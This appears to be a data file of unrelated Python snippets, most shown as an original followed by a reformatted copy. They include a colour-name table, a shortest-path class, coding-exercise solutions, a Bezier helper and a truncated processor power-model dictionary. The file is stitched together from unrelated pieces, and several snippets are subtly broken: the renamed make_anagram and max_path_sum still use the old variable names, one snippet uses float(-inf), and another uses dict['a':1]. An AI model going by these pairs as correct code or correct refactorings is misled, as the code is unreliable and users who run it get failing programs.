0.827', 'deeppink': '1.000 0.078 0.576', 'deepskyblue': '0.000 0.749 1.000', 'dimgray': '0.412 0.412 0.412', 'dimgrey': '0.412 0.412 0.412', 'dodgerblue': '0.118 0.565 1.000', 'firebrick': '0.698 0.133 0.133', 'floralwhite': '1.000 0.980 0.941', 'forestgreen': '0.133 0.545 0.133', 'fuchsia': '1.000 0.000 1.000', 'gainsboro': '0.863 0.863 0.863', 'ghostwhite': '0.973 0.973 1.000', 'gold': '1.000 0.843 0.000', 'goldenrod': '0.855 0.647 0.125', 'gray': '0.502 0.502 0.502', 'green': '0.000 0.502 0.000', 'greenyellow': '0.678 1.000 0.184', 'grey': '0.502 0.502 0.502', 'honeydew': '0.941 1.000 0.941', 'hotpink': '1.000 0.412 0.706', 'indianred': '0.804 0.361 0.361', 'indigo': '0.294 0.000 0.510', 'ivory': '1.000 1.000 0.941', 'khaki': '0.941 0.902 0.549', 'lavender': '0.902 0.902 0.980', 'lavenderblush': '1.000 0.941 0.961', 'lawngreen': '0.486 0.988 0.000', 'lemonchiffon': '1.000 0.980 0.804', 'lightblue': '0.678 0.847 0.902', 'lightcoral': '0.941 0.502 0.502', 'lightcyan': '0.878 1.000 1.000', 'lightgoldenrodyellow': '0.980 0.980 0.824', 'lightgray': '0.827 0.827 0.827', 'lightgreen': '0.565 0.933 0.565', 'lightgrey': '0.827 0.827 0.827', 'lightpink': '1.000 0.714 0.757', 'lightsalmon': '1.000 0.627 0.478', 'lightseagreen': '0.125 0.698 0.667', 'lightskyblue': '0.529 0.808 0.980', 'lightslategray': '0.467 0.533 0.600', 'lightslategrey': '0.467 0.533 0.600', 'lightsteelblue': '0.690 0.769 0.871', 'lightyellow': '1.000 1.000 0.878', 'lime': '0.000 1.000 0.000', 'limegreen': '0.196 0.804 0.196', 'linen': '0.980 0.941 0.902', 'magenta': '1.000 0.000 1.000', 'maroon': '0.502 0.000 0.000', 'mediumaquamarine': '0.400 0.804 0.667', 'mediumblue': '0.000 0.000 0.804', 'mediumorchid': '0.729 0.333 0.827', 'mediumpurple': '0.576 0.439 0.859', 'mediumseagreen': '0.235 0.702 0.443', 'mediumslateblue': '0.482 0.408 0.933', 'mediumspringgreen': '0.000 0.980 0.604', 'mediumturquoise': '0.282 0.820 0.800', 'mediumvioletred': '0.780 0.082 0.522', 'midnightblue': '0.098 0.098 0.439', 'mintcream': '0.961 1.000 0.980', 'mistyrose': '1.000 0.894 0.882', 'moccasin': '1.000 0.894 0.710', 'navajowhite': '1.000 0.871 0.678', 'navy': '0.000 0.000 0.502', 'oldlace': '0.992 0.961 0.902', 'olive': '0.502 0.502 0.000', 'olivedrab': '0.420 0.557 0.137', 'orange': '1.000 0.647 0.000', 'orangered': '1.000 0.271 0.000', 'orchid': '0.855 0.439 0.839', 'palegoldenrod': '0.933 0.910 0.667', 'palegreen': '0.596 0.984 0.596', 'paleturquoise': '0.686 0.933 0.933', 'palevioletred': '0.859 0.439 0.576', 'papayawhip': '1.000 0.937 0.835', 'peachpuff': '1.000 0.855 0.725', 'peru': '0.804 0.522 0.247', 'pink': '1.000 0.753 0.796', 'plum': '0.867 0.627 0.867', 'powderblue': '0.690 0.878 0.902', 'purple': '0.502 0.000 0.502', 'red': '1.000 0.000 0.000', 'rosybrown': '0.737 0.561 0.561', 'royalblue': '0.255 0.412 0.882', 'saddlebrown': '0.545 0.271 0.075', 'salmon': '0.980 0.502 0.447', 'sandybrown': '0.957 0.643 0.376', 'seagreen': '0.180 0.545 0.341', 'seashell': '1.000 0.961 0.933', 'sienna': '0.627 0.322 0.176', 'silver': '0.753 0.753 0.753', 'skyblue': '0.529 0.808 0.922', 'slateblue': '0.416 0.353 0.804', 'slategray': '0.439 0.502 0.565', 'slategrey': '0.439 0.502 0.565', 'snow': '1.000 0.980 0.980', 'springgreen': '0.000 1.000 0.498', 'steelblue': '0.275 0.510 0.706', 'tan': '0.824 0.706 0.549', 'teal': '0.000 0.502 0.502', 'thistle': '0.847 0.749 0.847', 'tomato': '1.000 0.388 0.278', 'turquoise': '0.251 0.878 0.816', 'violet': '0.933 0.510 0.933', 'wheat': '0.961 0.871 0.702', 'white': '1.000 1.000 1.000', 'whitesmoke': '0.961 0.961 0.961', 'yellow': '1.000 1.000 0.000', 'yellowgreen': '0.604 0.804 0.196'}
__author__="ijt3cd" if __name__ == '__main__': print("more junk")
__author__ = 'ijt3cd' if __name__ == '__main__': print('more junk')
#-*- coding:utf-8 -*- class ParseException(Exception): pass class ThroughLoop(Exception): pass
class Parseexception(Exception): pass class Throughloop(Exception): pass
class LogManager: def __init__(): pass def getLogger(loggerName): logger = log.setup_custom_logger(loggerName) logger = logging.getLogger('root')
class Logmanager: def __init__(): pass def get_logger(loggerName): logger = log.setup_custom_logger(loggerName) logger = logging.getLogger('root')
# Copyright (c) 2019 Cable Television Laboratories, Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Unit tests for convert.py class ShortestPath: def __init__(self, path_edges): self.neighbors = {} for edge in path_edges: self.add_edge(*edge) def add_edge(self, a, b): if a not in self.neighbors: self.neighbors[a] = [] if b not in self.neighbors[a]: self.neighbors[a].append(b) if b not in self.neighbors: self.neighbors[b] = [] if a not in self.neighbors[b]: self.neighbors[b].append(a) def get(self, a, b, exclude=lambda node: False): # Shortest path from a to b return self.__rec_path(a, b, [], exclude) def __rec_path(self, a, b, visited, exclude): if a == b: return [a] new_visited = visited + [a] paths = list() for neighbor in self.neighbors[a]: if neighbor in new_visited: continue if exclude(neighbor) and neighbor != b: continue path = self.__rec_path(neighbor, b, new_visited, exclude) if path: paths.append(path) paths.sort(key=len) return [a] + paths[0] if len(paths) else None
class Shortestpath: def __init__(self, path_edges): self.neighbors = {} for edge in path_edges: self.add_edge(*edge) def add_edge(self, a, b): if a not in self.neighbors: self.neighbors[a] = [] if b not in self.neighbors[a]: self.neighbors[a].append(b) if b not in self.neighbors: self.neighbors[b] = [] if a not in self.neighbors[b]: self.neighbors[b].append(a) def get(self, a, b, exclude=lambda node: False): return self.__rec_path(a, b, [], exclude) def __rec_path(self, a, b, visited, exclude): if a == b: return [a] new_visited = visited + [a] paths = list() for neighbor in self.neighbors[a]: if neighbor in new_visited: continue if exclude(neighbor) and neighbor != b: continue path = self.__rec_path(neighbor, b, new_visited, exclude) if path: paths.append(path) paths.sort(key=len) return [a] + paths[0] if len(paths) else None
# # See ../LICENSE # # This file is used to form a consistent base used by the specific field implementations. # It was intended to, implementation might differ. # # class Record: def __init__(self, henk): self.fields = {} self.origin = 0 #in file location self.raw_length = 0 self.score = None #validation score
class Record: def __init__(self, henk): self.fields = {} self.origin = 0 self.raw_length = 0 self.score = None
''' https://www.geeksforgeeks.org/calculate-square-of-a-number-without-using-and-pow/ Calculate square of a number without using *, / and pow() Difficulty Level : Medium Last Updated : 23 Feb, 2021 Geek Week Given an integer n, calculate the square of a number without using *, / and pow(). Examples : Input: n = 5 Output: 25 Input: 7 Output: 49 Input: n = 12 Output: 144 A Simple Solution is to repeatedly add n to result. ''' # Simple solution to # calculate square without # using * and pow() def square(n): # handle negative input if (n < 0): n = -n # Initialize result res = n # Add n to res n-1 times for i in range(1, n): res += n return res # Driver Code for n in range(1, 6): print("n =", n, end=", ") print("n^2 =", square(n))
""" https://www.geeksforgeeks.org/calculate-square-of-a-number-without-using-and-pow/ Calculate square of a number without using *, / and pow() Difficulty Level : Medium Last Updated : 23 Feb, 2021 Geek Week Given an integer n, calculate the square of a number without using *, / and pow(). Examples : Input: n = 5 Output: 25 Input: 7 Output: 49 Input: n = 12 Output: 144 A Simple Solution is to repeatedly add n to result. """ def square(n): if n < 0: n = -n res = n for i in range(1, n): res += n return res for n in range(1, 6): print('n =', n, end=', ') print('n^2 =', square(n))
if foo(): qu = 1 else: qu = 2 y = qu
if foo(): qu = 1 else: qu = 2 y = qu
# -*- coding: utf-8 -*- # write.text.test.py with open("hello.txt", "w") as file: file.write("hello world") with open("hello.txt", "a") as file: file.write("\ngood bye, world")
with open('hello.txt', 'w') as file: file.write('hello world') with open('hello.txt', 'a') as file: file.write('\ngood bye, world')
###################################################### ## Global settings class Config: AMQP_HOST = 'localhost'
class Config: amqp_host = 'localhost'
expected_output = { 'vrf': { 'default': { 'address': { '10.4.1.1': { 'type': 'server'} } }, 'management': { 'address': { '10.4.1.1': { 'type': 'server'} } } } }
expected_output = {'vrf': {'default': {'address': {'10.4.1.1': {'type': 'server'}}}, 'management': {'address': {'10.4.1.1': {'type': 'server'}}}}}
def makeAnagram(a, b): countA = [0] * 26 countB = [0] * 26 index = 0 while index<len(a): countA[ord(a[index]) - 97]+=1 index+=1 index = 0 while index<len(b): countB[ord(b[index]) - 97]+=1 index+=1 res = 0 for i in range(len(countA)): res += abs(countA[i] - countB[i]) return res if __name__ == '__main__': print(makeAnagram('showman', 'woman'))
def make_anagram(a, b): count_a = [0] * 26 count_b = [0] * 26 index = 0 while index < len(a): countA[ord(a[index]) - 97] += 1 index += 1 index = 0 while index < len(b): countB[ord(b[index]) - 97] += 1 index += 1 res = 0 for i in range(len(countA)): res += abs(countA[i] - countB[i]) return res if __name__ == '__main__': print(make_anagram('showman', 'woman'))
# Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def maxPathSum(self, root: TreeNode) -> int: self.ans = float(-inf) def search(root): if root is None: return 0 leftMax = search(root.left) rightMax = search(root.right) self.ans = max(max(leftMax, 0) + max(rightMax, 0) + root.val, self.ans) return max(leftMax, rightMax, 0) + root.val search(root) return self.ans
class Solution: def max_path_sum(self, root: TreeNode) -> int: self.ans = float(-inf) def search(root): if root is None: return 0 left_max = search(root.left) right_max = search(root.right) self.ans = max(max(leftMax, 0) + max(rightMax, 0) + root.val, self.ans) return max(leftMax, rightMax, 0) + root.val search(root) return self.ans
var1 = 2 var2 = '''hello this is raj i am dying''' for num in range(0,3): file = open(f"orders/file{num}.txt",'w') file.write(f"hello x{num}"+'\n'+str(var1)+'\n'+var2) file.close
var1 = 2 var2 = 'hello\nthis is raj\ni am dying' for num in range(0, 3): file = open(f'orders/file{num}.txt', 'w') file.write(f'hello x{num}' + '\n' + str(var1) + '\n' + var2) file.close
# link : https://www.codewars.com/kata/5390bac347d09b7da40006f6 def to_jaden_case(string): new_string = '' last_c = ' ' for c in string: new_string += c.upper() if last_c == ' ' else c last_c = c return new_string print(to_jaden_case("how can mirrors be real if our eyes aren't real"))
def to_jaden_case(string): new_string = '' last_c = ' ' for c in string: new_string += c.upper() if last_c == ' ' else c last_c = c return new_string print(to_jaden_case("how can mirrors be real if our eyes aren't real"))
#stripe patterns to follow #ideal 400x400 pattern_one = [2,1,2,1,4,2,2,1,4,2,4,2,1,2,1,4,2,4,2,2,4,2,4,2,4,3,4,2,4,2,1,4,3,2] pattern_one_width=[4,2,4,2,10,4,4,2,10,4,10,4,2,4,2,10,4,10,4,4,10,4,10,4,10,5,10,4,10,4,2,10,5,2] pattern_two_width = [30, 30, 30, 30, 30] #5x30 + 2x30black #originalstyle
pattern_one = [2, 1, 2, 1, 4, 2, 2, 1, 4, 2, 4, 2, 1, 2, 1, 4, 2, 4, 2, 2, 4, 2, 4, 2, 4, 3, 4, 2, 4, 2, 1, 4, 3, 2] pattern_one_width = [4, 2, 4, 2, 10, 4, 4, 2, 10, 4, 10, 4, 2, 4, 2, 10, 4, 10, 4, 4, 10, 4, 10, 4, 10, 5, 10, 4, 10, 4, 2, 10, 5, 2] pattern_two_width = [30, 30, 30, 30, 30]
''' from sys import * q = int(stdin.readline()) while q: q = q - 1 n = int(stdin.readline()) a = list(map(int, stdin.readline().split())) Hash = [0] * (n+1) for i in a: Hash[i] += 1 Hash.sort(reverse=True) res = 0 now = int(1e9) for i in Hash: now = max(min(now-1, i), 0) res += now stdout.write(str(res)+"\n") ''' ''' # Hack def check(n): summed=0 for i in n: summed+=int(i) if(summed%4==0): return n if((int(n[-1])+4-summed%4)<10): return n[:-1]+str(int(n[-1])+4-summed%4) else: out=0 n=str(int(n[:-1])+1)+'0' for i in n: out+=int(i) if(out%4==0): return n if((0 + 4-out%4)<10): return n[:-1]+str(int(n[-1])+4-out%4) n=input() a=check(n) print(int(a)) ''' ''' from sys import * q = int(stdin.readline()) s1 = stdin.readline() n = int(stdin.readline()) while n: n -= 1 s2 = stdin.readline() ''' a = dict['a':1] print(type(a))
""" from sys import * q = int(stdin.readline()) while q: q = q - 1 n = int(stdin.readline()) a = list(map(int, stdin.readline().split())) Hash = [0] * (n+1) for i in a: Hash[i] += 1 Hash.sort(reverse=True) res = 0 now = int(1e9) for i in Hash: now = max(min(now-1, i), 0) res += now stdout.write(str(res)+" ") """ "\n# Hack\ndef check(n):\n summed=0\n for i in n:\n summed+=int(i)\n if(summed%4==0):\n return n\n if((int(n[-1])+4-summed%4)<10):\n return n[:-1]+str(int(n[-1])+4-summed%4)\n else:\n out=0\n n=str(int(n[:-1])+1)+'0'\n for i in n:\n out+=int(i)\n if(out%4==0):\n return n\n if((0 + 4-out%4)<10):\n return n[:-1]+str(int(n[-1])+4-out%4)\n\n\n\nn=input()\na=check(n)\nprint(int(a))\n" '\nfrom sys import *\nq = int(stdin.readline())\ns1 = stdin.readline()\nn = int(stdin.readline())\nwhile n:\n n -= 1\n s2 = stdin.readline()\n' a = dict['a':1] print(type(a))
def dtlayout(i, p, *rows): i["Layouts/SiStrip Layouts/" + p] = DQMItem(layout=rows) dtlayout(dqmitems, "SiStrip_Digi_Summary", ["SiStrip/MechanicalView/TIB/Summary_NumberOfDigis_in_TIB"], ["SiStrip/MechanicalView/TOB/Summary_NumberOfDigis_in_TOB"], ["SiStrip/MechanicalView/TID/MINUS/Summary_NumberOfDigis_in_MINUS", "SiStrip/MechanicalView/TID/PLUS/Summary_NumberOfDigis_in_PLUS"], ["SiStrip/MechanicalView/TEC/MINUS/Summary_NumberOfDigis_in_MINUS", "SiStrip/MechanicalView/TEC/PLUS/Summary_NumberOfDigis_in_PLUS"])
def dtlayout(i, p, *rows): i['Layouts/SiStrip Layouts/' + p] = dqm_item(layout=rows) dtlayout(dqmitems, 'SiStrip_Digi_Summary', ['SiStrip/MechanicalView/TIB/Summary_NumberOfDigis_in_TIB'], ['SiStrip/MechanicalView/TOB/Summary_NumberOfDigis_in_TOB'], ['SiStrip/MechanicalView/TID/MINUS/Summary_NumberOfDigis_in_MINUS', 'SiStrip/MechanicalView/TID/PLUS/Summary_NumberOfDigis_in_PLUS'], ['SiStrip/MechanicalView/TEC/MINUS/Summary_NumberOfDigis_in_MINUS', 'SiStrip/MechanicalView/TEC/PLUS/Summary_NumberOfDigis_in_PLUS'])
def make_bezier(xys): # xys should be a sequence of 2-tuples (Bezier control points) n = len(xys) combinations = pascal_row(n-1) def bezier(ts): # This uses the generalized formula for bezier curves # http://en.wikipedia.org/wiki/B%C3%A9zier_curve#Generalization result = [] for t in ts: tpowers = (t**i for i in range(n)) upowers = reversed([(1-t)**i for i in range(n)]) coefs = [c*a*b for c, a, b in zip(combinations, tpowers, upowers)] result.append( tuple(sum([coef*p for coef, p in zip(coefs, ps)]) for ps in zip(*xys))) return result return bezier def pascal_row(n): # This returns the nth row of Pascal's Triangle result = [1] x, numerator = 1, n for denominator in range(1, n//2+1): # print(numerator,denominator,x) x *= numerator x /= denominator result.append(x) numerator -= 1 if n&1 == 0: # n is even result.extend(reversed(result[:-1])) else: result.extend(reversed(result)) return result # def draw_bezier(xyz,thick,draw): # # ts = [t/100.0 for t in range(101)] # # bezier = make_bezier(xyz) # # points = bezier(ts) # # for p in range(len(points)-1): # # draw.line([points[p],points[p+1]],fill=2,width=thick) # draw.line([xyz[0],xyz[1]],fill=2,width=thick)
def make_bezier(xys): n = len(xys) combinations = pascal_row(n - 1) def bezier(ts): result = [] for t in ts: tpowers = (t ** i for i in range(n)) upowers = reversed([(1 - t) ** i for i in range(n)]) coefs = [c * a * b for (c, a, b) in zip(combinations, tpowers, upowers)] result.append(tuple((sum([coef * p for (coef, p) in zip(coefs, ps)]) for ps in zip(*xys)))) return result return bezier def pascal_row(n): result = [1] (x, numerator) = (1, n) for denominator in range(1, n // 2 + 1): x *= numerator x /= denominator result.append(x) numerator -= 1 if n & 1 == 0: result.extend(reversed(result[:-1])) else: result.extend(reversed(result)) return result
power = {'BUSES': {'Area': 1.33155, 'Bus/Area': 1.33155, 'Bus/Gate Leakage': 0.00662954, 'Bus/Peak Dynamic': 0.0, 'Bus/Runtime Dynamic': 0.0, 'Bus/Subthreshold Leakage': 0.0691322, 'Bus/Subthreshold Leakage with power gating': 0.0259246, 'Gate Leakage': 0.00662954, 'Peak Dynamic': 0.0, 'Runtime Dynamic': 0.0, 'Subthreshold Leakage': 0.0691322, 'Subthreshold Leakage with power gating': 0.0259246}, 'Core': [{'Area': 32.6082, 'Execution Unit/Area': 8.2042, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 1.88938e-06, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 3.03604e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.122718, 'Execution Unit/Instruction Scheduler/Area': 2.17927, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.3257, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.563995, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.323467, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.21316, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.321937, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.50532, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 5.73574e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0118069, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0853788, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0873192, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0853846, 'Execution Unit/Register Files/Runtime Dynamic': 0.0991261, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.206311, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.553835, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155, 'Execution Unit/Runtime Dynamic': 2.47419, 'Execution Unit/Subthreshold Leakage': 1.83518, 'Execution Unit/Subthreshold Leakage with power gating': 0.709678, 'Gate Leakage': 0.372997, 'Instruction Fetch Unit/Area': 5.86007, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00309226, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00309226, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00274233, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00108839, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00125435, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0101812, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0278984, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0590479, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0839422, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.33945, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.267377, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.285106, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.82106, 'Instruction Fetch Unit/Runtime Dynamic': 0.674505, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932587, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0505317, 'L2/Runtime Dynamic': 0.0135391, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80969, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.4972, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.10569, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0351387, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0731189, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0731189, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.84389, 'Load Store Unit/Runtime Dynamic': 1.53941, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.180299, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.360597, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591622, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283406, 'Memory Management Unit/Area': 0.434579, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0639887, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0644165, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00813591, 'Memory 